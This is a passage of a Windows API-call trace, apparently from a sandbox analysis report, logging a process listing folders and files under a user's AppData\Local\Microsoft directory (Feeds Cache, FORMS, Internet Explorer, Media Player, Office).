ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.575] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bcd530, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xff0498b1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.575] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79ba73d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ba73d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xff107f92, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="FeedsStore.feedsdb-ms", cAlternateFileName="FEEDSS~1.FEE")) returned 1 [0221.575] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ba73d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfee3456d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Feeds~", cAlternateFileName="MICROS~1")) returned 1 [0221.575] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798876f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xff0498b1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", cAlternateFileName="{5588A~1")) returned 1 [0221.575] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798876f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xff0498b1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", cAlternateFileName="{5588A~1")) returned 0 [0221.575] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.576] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds Cache", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds Cache", lpFilePart=0x0) returned 0x36 [0221.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.576] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds Cache", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds Cache", lpFilePart=0x0) returned 0x36 [0221.576] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfea09ee5, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.577] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfea09ee5, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.577] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfedc214c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1NBUR4HR", cAlternateFileName="")) returned 1 [0221.577] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfee8082e, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="6ASVN7J7", cAlternateFileName="")) returned 1 [0221.577] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xff06fa11, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="D68G7BIJ", cAlternateFileName="")) returned 1 [0221.577] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x79b81270, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe9e3d85, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0221.577] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x79b81270, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xccd5e690, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0221.577] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfed03a6b, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="KQMHSVKD", cAlternateFileName="")) returned 1 [0221.577] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfed03a6b, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="KQMHSVKD", cAlternateFileName="")) returned 0 [0221.577] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.577] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\FORMS", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\FORMS", lpFilePart=0x0) returned 0x30 [0221.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.577] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\FORMS", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\FORMS", lpFilePart=0x0) returned 0x30 [0221.578] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\FORMS\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2cedac90, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.578] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2cedac90, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.578] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2cedac90, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2d1623f0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x3c0dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="FRMCACHE.DAT", cAlternateFileName="")) returned 1 [0221.578] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0221.578] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.578] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Internet Explorer", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Internet Explorer", lpFilePart=0x0) returned 0x3c [0221.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.579] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Internet Explorer", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Internet Explorer", lpFilePart=0x0) returned 0x3c [0221.579] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7983b430, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x519a8410, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x519a8410, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.579] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7983b430, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x519a8410, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x519a8410, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.579] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79b81270, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xb371c2, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x2fa9, dwReserved0=0x0, dwReserved1=0x0, cFileName="brndlog.bak", cAlternateFileName="")) returned 1 [0221.579] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79b81270, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ef07f70, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x2fa5, dwReserved0=0x0, dwReserved1=0x0, cFileName="brndlog.txt", cAlternateFileName="")) returned 1 [0221.579] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x519a8410, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x519a8410, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x8e4a11a0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x2466, dwReserved0=0x0, dwReserved1=0x0, cFileName="frameiconcache.dat", cAlternateFileName="FRAMEI~1.DAT")) returned 1 [0221.579] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4dbf6cc0, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x4dbf6cc0, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x4dbf6cc0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSIMGSIZ.DAT", cAlternateFileName="")) returned 1 [0221.579] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4d225200, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x518e9d30, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x518e9d30, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0221.579] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4d225200, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x518e9d30, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x518e9d30, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 0 [0221.579] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.580] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Media Player", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Media Player", lpFilePart=0x0) returned 0x37 [0221.580] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.580] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Media Player", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Media Player", lpFilePart=0x0) returned 0x37 [0221.580] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Media Player\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798152d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xcba84960, ftLastAccessTime.dwHighDateTime=0x1d706b2, ftLastWriteTime.dwLowDateTime=0xcba84960, ftLastWriteTime.dwHighDateTime=0x1d706b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.584] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798152d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xcba84960, ftLastAccessTime.dwHighDateTime=0x1d706b2, ftLastWriteTime.dwLowDateTime=0xcba84960, ftLastWriteTime.dwHighDateTime=0x1d706b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.584] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79b5b110, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b5b110, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x2ada6de0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x105000, dwReserved0=0x0, dwReserved1=0x0, cFileName="CurrentDatabase_372.wmdb", cAlternateFileName="CURREN~1.WMD")) returned 1 [0221.584] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79b5b110, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2acc25a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x2acc25a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x1106e, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalMLS_3.wmdb", cAlternateFileName="LOCALM~1.WMD")) returned 1 [0221.584] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7983b430, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7983b430, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf73e9a4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sync Playlists", cAlternateFileName="SYNCPL~1")) returned 1 [0221.584] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcba84960, ftCreationTime.dwHighDateTime=0x1d706b2, ftLastAccessTime.dwLowDateTime=0xcba84960, ftLastAccessTime.dwHighDateTime=0x1d706b2, ftLastWriteTime.dwLowDateTime=0xcba84960, ftLastWriteTime.dwHighDateTime=0x1d706b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Transcoded Files Cache", cAlternateFileName="TRANSC~1")) returned 1 [0221.584] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcba84960, ftCreationTime.dwHighDateTime=0x1d706b2, ftLastAccessTime.dwLowDateTime=0xcba84960, ftLastAccessTime.dwHighDateTime=0x1d706b2, ftLastWriteTime.dwLowDateTime=0xcba84960, ftLastWriteTime.dwHighDateTime=0x1d706b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Transcoded Files Cache", cAlternateFileName="TRANSC~1")) returned 0 [0221.584] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.585] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Office", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Office", lpFilePart=0x0) returned 0x31 [0221.585] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.585] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Office", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Office", lpFilePart=0x0) returned 0x31 [0221.585] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Office\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x14ff8dd0, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x5bb5ba10, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x5bb5ba10, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.586] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x14ff8dd0, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x5bb5ba10, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x5bb5ba10, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.586] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x14ff8dd0, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x2dbcc430, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2dbcc430, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="16.0", cAlternateFileName="")) returned 1 [0221.586] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5bb5ba10, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x44005180, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x44005180, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OTele", cAlternateFileName="")) returned 1 [0221.586] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5bb5ba10, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x44005180, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x44005180, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OTele", cAlternateFileName="")) returned 0 [0221.586] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.586] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive", nBufferLength=0x105, 